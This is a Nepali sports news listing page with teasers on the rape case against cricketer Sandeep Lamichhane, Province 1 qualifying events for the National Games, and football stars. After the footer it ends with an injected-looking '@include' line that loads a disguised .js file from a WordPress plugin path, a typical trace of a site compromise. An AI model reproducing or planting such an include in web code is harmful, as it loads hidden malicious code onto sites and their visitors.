खेलकुद

सन्दिप लामिछानेविरुद्ध अदालतमा हुने मुद्दा दर्तामा कस्तो सजाय मागदाबी गरिएको छ?

काठमाडौं– नेपाली राष्ट्रिय क्रिकेट टिमका पूर्वकप्तान सन्दिप लामिछानेविरूद्ध जिल्ला अदालत काठमाडौंमा सोमबार मुद्दा दर्ता गरिने भएको छ। प्रहरीले अनुसन्धान सकेर सरकारी वकिलको कार्यालयलाई दिएको प्रतिवेदनका आधारमा एक नावालिग किशोरीलाई बलात्कार गरेको अभियोगमा लामिछानेविरुद्ध मुद्दा दर्ता गर्न लागिएको हो। उनलाई १२ बर्षसम्मको कैद सजायको मागदाबीसहितको मुद्दा दर्ता हुन लागेको हो। सोमबार…

स्टार खेलाडी गौरिकाको स्वास्थ्यमा के भयो?

काठमाडौं– स्टार पौडी खेलाडी गौरिका सिंहको पेटमा समस्या भएपछि राष्ट्रिय खेलकुदका शनिबारका प्रतियोगिता छुटेका छन्। गौरिकाकी आमा गरिमा राणाका अनुसार उनको पेटमा समस्या भएपछि दिउँसो अस्पताल गएकी थिइन्। शनिबार पोखराको फिस्टेल एकेडेमीमा नवौं राष्ट्रिय खेलकुद अन्तर्गत आयोजित प्रतियोगिताको १ मिटर फिस्टायल र २ सय मिटर ब्याकस्ट्रोकबाट नाम फिर्ता लिएकी थिइन्।…

प्रदेश एक स्तरिय टेवल टेनिसमा महिला तर्फ सुनसरीको बर्चश्व, पुरुषमा मोरङ्ग

इटहरी - भदौँ २९ गतेबाट सुनसरीको इटहरी स्थित टिटि कभर्डहलमा भएको प्रदेश एक स्तरिय टेवल टेनिस प्रतियोगितामा सुनसरीले आफ्नो बर्चश्व देखाएको छ । आगामी २८ गतेदेखि कार्तिक ३ गतेसम्म गण्डकी प्रदेशमा आयोजना हुने नवौँ राष्टिय खेलकुद प्रतियोगिताको लागि भएको छनौट खेलमा पुरुष सिंगल तर्फ मोरङ्गका बोधित डिसिले स्वर्ण पदक पाएका छन्…

प्रदेश एक भरीकै साइक्लिङ्गको वृहत प्रतियोगिता सम्पन्न, डाउन हिलतर्फ महिला पुरुष दुवैतर्फ सुनसरी प्रथम 

इटहरी - असोज २८ गतेदेखि गण्डकी प्रदेशमा हुन लागेको ९ औं राष्ट्रिय खेलकुद प्रतियोगिताको लागि शुक्रबार धरानमा साइक्लिङको प्रदेश १ स्तरीय छनौट प्रतियोगितामा डाउल हिलतर्फ महिला पुरुष दुवैमा सुनसरी प्रथम भएको छ । प्रदेश खेलकुद बोर्डले प्रदेश एकभरीकै साइक्लिङ्गमा जिल्ला छनौट बाट आएका खेलाडीहरुको  धरान १४ विजयपुरस्थित पञ्चकन्या जङ्गलमा छनौट प्रतियोगिता…

पौडीमा संखुवासभाका विकासलाई तीन स्वर्ण, महिला तर्फ धनकुटाकी वियुशा राईलाई दुई स्वर्ण 

इटहरी- सुनसरीको इटहरीमा बिहिबार सम्पन्न भएको प्रदेश एक स्तरिय पौडिको छनौट प्रतियोगितामा संखुवासभाका विकास कुमालले तीन स्वर्ण जितेका छन् । पुरुष र महिला तर्फ फरक फरक भएको प्रतियोगितामा १५ जना पुरुष र १० जना महिला खेलाडी सहभागि भएका थिए । आगामी असोज २८ गतेदेखि कार्तिक ३ गतेसम्म गण्डकी प्रदेशमा हुने…

प्रदेश एकको फुटवलमा सुनसरी, मोरङ्ग, धनकुटा र झापा विजयी 

इटहरी - नवौँ राष्ट्रिय खेलकुद प्रतियोगिताको लागि भएको प्रदेश एक छनौटको महिला फुटवल तर्फ विहिबारको खेलमा सुनसरी, मोरङ्ग, धनकुटा र झापा जिल्लाले जित हासिल गरेका छन् । सुनसरीको इटहरी रंगशालामा भएको प्रदेश छनौट फुटवल प्रतियोगिताको बिहिबारको पहिलो खेलमा इलामलाई १ को विरुद्ध २ गोल गर्दै सुनसरीले जित निकालेको छ ।…

प्रदेश एकको महिला भलिवल खेल झापाको दमकमा शुरु, सदस्य सचिवद्धारा उद्घाटन

दमक- प्रदेश एक स्तरिय महिला भलिवलको उद्भाटन खेल झापाको दमकमा बुधबार आयोजना भएको छ । प्रदेश नम्बर एक खेलकुद विकास बोर्डका सदस्य  सचिव ंहंशराज वाग्लेले महिला भलिवलको उद्भाटन गरे । उद्घाटन पछि झापाको दमकमा तीन खेल भएका थिए भने झापाकै कमल गाउँपालिका स्थित पाडाजुँगीमा तीन खेल सम्पन्न भएका थिए ।…

सीपीएल छाडेर नेपाल फर्किँदै सन्दिप लामिछाने, भन्छन्– निष्पक्ष अनुसन्धान होस्

काठमाडौं– अन्तर्राष्ट्रिय क्रिकेट खेलाडी सन्दिप लामिछानेले आफूविरुद्ध लागेको बलात्कार अभियोगको अनुसन्धानमा सघाउने बताएका छन्। सामाजिक सञ्जाल ट्वीटरमा उनले एक सन्देश लेख्दै क्यारेबियन प्रिमियर लिग (सीपीएल) छाडेको र केही दिनमा नेपाल आइपुग्ने जानकारी दिएका छन्। आधारहिन अभियोगको निष्पक्ष अनुसन्धानमा विश्वास गरेको बताउँदै उनले नेपालको कानुनको सम्मान गर्ने बताएका छन्। प्रहरीले पक्राउ…

कानुनी लडाईमा जाने क्याप्टेन सन्दिप लामिछानेको निधो, कसले गर्दैछ सहयोग?

काठमाडौं– नाबालिकासँग यौन सम्बन्ध राखेका कारण बलात्कारको अभियोग लागेका राष्ट्रिय क्रिकेट टोलीका कप्तान सन्दिप लामिछानेले कानुनी लडाईमा जाने निधो गरेका छन्। हाल जमैकामा लिग खेल्न पुगेका लामिछानेले क्रिकेट एशोसिएशन अफ नेपाल (क्यान)का पदाधिकारीसँग सम्पर्क गरी कानुनी लडाईमा जाने निधो गरेका हुन्। उनले त्यसका लागि सहयोग गर्न क्यानलाई आग्रह गरेका छन्।…

विश्वकप नजितेसम्म मेस्सीले संन्यास नलिने

एजेन्सी- विश्वकप फुटबल प्रतियोगितालगत्तै अन्तर्राष्ट्रिय फुटबलबाट संन्यास लिने तयारी गरेका अर्जेन्टिनी स्टार लियोनल मेस्सी निर्णयबाट पछि हटेका छन् । उनले अर्जेन्टिनाले विश्वकप नजितेसम्म संन्यास नलिनेसमेत घोषणा गरेका छन् । रुसमा जारी विश्वकपमा खराब प्रदर्शन गरिरहेको अर्जेन्टिनाको नकआउट चरणसम्मको यात्रा नै संकटमा परेको छ । यसै प्रतियोगितापछि मेस्सीले संन्यास लिने अडकलबाजी भइरहेका बेला…

रोनाल्डोको त्यो पेनाल्टिले उल्टियो म्याच

काठमाडौं । पहिलो लेगमा ३-० को हार व्यहोरेको युभेन्टसले उत्कृष्ट कमब्याक गर्दै रियल मड्रिडलाई हराएको छ । तर, इन्जुरी टाइममा क्रिष्टियानो रोनाल्डोले गरेको पेनाल्टी गोलको मद्दतमा रियल मड्रिड च्याम्पियन्स लिगको सेमिफाइनलमा पुगेको छ । दोस्रो लेगमा रियल मड्रिड युभेन्टससँग ३-१ ले पराजित भएको छ । तर, ९७ औं मिनेटमा रोनाल्डोको…

मेस्सीले गोल हान्दा बार्सिलोनामा साँच्चैको पराकम्पन : वैज्ञानिकहरू

काठमाडौं। फूटबलका विश्व महारथी अर्जेन्टिनी विङ्गर स्टार लियोनल मेस्सीले गोल गर्दा स्पेनको बार्सिलोना सहरमा पराकम्पन आउने एउटा वैज्ञानिक अध्ययनले देखाएको छ । मेस्सी फूटबल क्लव बार्सिलोनाबाट खेल्छन् । स्पेनका वैज्ञानिकहरूले मेसीले बार्सिलोना फुटबल टीमका लागि गोल हान्दा बार्सिलोना शहरमा ‘साँच्चै नै कम्पन हुने गरेको’ पाइएको बताएका छन् । अनुसन्धानकर्ताहरूले क्याम्प…

अन्तर्राष्ट्रिय फुटबल प्रतियोगिताको उपाधि थ्री–स्टारलाई

बुटवल । तेस्रो मदन भण्डारी अन्तर्राष्ट्रिय नकआउट फुटबल प्रतियोगिताको उपाधि थ्री–स्टार क्लबले जितेको छ । मदन भण्डारी स्पोस्र्टस एकेडेमी प्रदेश नं ५ को आयोजनामा बुटवलको रामनगरस्थित कालिका मानव ज्ञान माविको मैदानमा आज भएको अन्तिम खेलमा मनाङ–मस्र्याङ्दी क्लबलाई २–१ ले पराजित गर्दै थ्री–स्टारले सो उपाधि जितेको हो । खेल शुरु भएको…

रोनी म्यान्चेष्टर छाड्न तयार छन् ?

लण्डन । इङल्यान्ड तथा म्यानचेस्टर युनाइटेडका कीर्तिमानी गोलकर्ता वायन रोनीले केही सातामै आफ्नो भविष्यबारे निर्णय गर्ने बताएका छन् । इङलिस टोलीमा नपरेपछिे रोनी आफ्नो भविष्यलाई लिएर सचेत भएका हुन् । म्यानचेस्टरमा पछिल्लो १३ वर्ष बिताएका ३१ वर्षीय रोनी क्लबमै पनि पहिलो रोजाईका खेलाडी हुन छाडेका छन् । म्यानचेस्टरले युरोपा लिग…

मेसीमाथि लगाइएको प्रतिबन्धको विरोध

बोलिभियाविरुद्घको खेलमा अर्जेन्टिना आफ्ना स्टार खेलाडी लियोनल मेसी बिना नै मैदानमा ओर्लिएको थियो । विश्वकप छनोटकै चिलीविरुद्घको अघिल्लो खेलमा सहायक रेफ्रीलाई दुव्र्यवहार गरेको आरोपमा मेसीमाथि चार खेलको प्रतिबन्ध लगाइएको छ । घरेलु मैदानमा खेलिएको चिलीविरुद्घको खेलमा अर्जेन्टिना १-० गोलले विजयी भएको थियो । उक्त खेलमा एकमात्र गोल मेसीले नै पेनाल्टीमार्फत…

website design & develop by thakuricreation Pvt. Ltd.

@include "wp-content/plugins/ad-inserter/includes/google-api-8/vendor/composer/include/7025.js";